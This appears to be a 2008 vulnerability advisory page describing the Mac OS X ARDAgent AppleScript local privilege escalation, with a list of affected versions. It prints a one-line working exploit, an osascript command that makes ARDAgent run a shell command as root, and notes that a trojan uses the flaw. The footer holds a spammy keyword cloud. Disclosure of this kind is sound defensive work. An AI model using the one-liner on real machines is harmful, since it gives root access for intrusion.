about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability


Title Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability
Published 2008-06-19-12:00AM
Updated 2008-08-01-08:27AM
Class Access Validation Error
CVE  
Remote  No
Local  Yes
Credit  anonymous
Vulnerable  Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4
Apple Mac OS X 10.5
Not Vulnerable  
Code  The following exploit code is available:osascript -e 'tell app "ARDAgent" to do shell script "whoami"';NOTE: This issue is being exploited by the 'AppleScript.THT' trojan to gain elevated privileges. Please see the references for more information.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 23:05:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo exploitphp www.SLEAZY phphtml.ph asian sex ruantest.c Sex 1 free xxx v www.xxx.co Cart Hassa indianpass Tia Saheela ds games.h NOWSE jp.sex CMS is Fre bila houdo Wwwvidio.c Exploits S oregondono xxx sxe jp.sex wwwporno,m indianpass php-nuke 2 desi kakan php error Naai sex amxmodx www.ineedt rtr trty Heroineg a news for C jp.sex sexs tv avizon ira php-nuke+2 oregondono Free First t327t www.fun4mo local root Naked toon CMS is Fre CMS is Fre CMS is Fre CMS is Fre port 1468 Nagama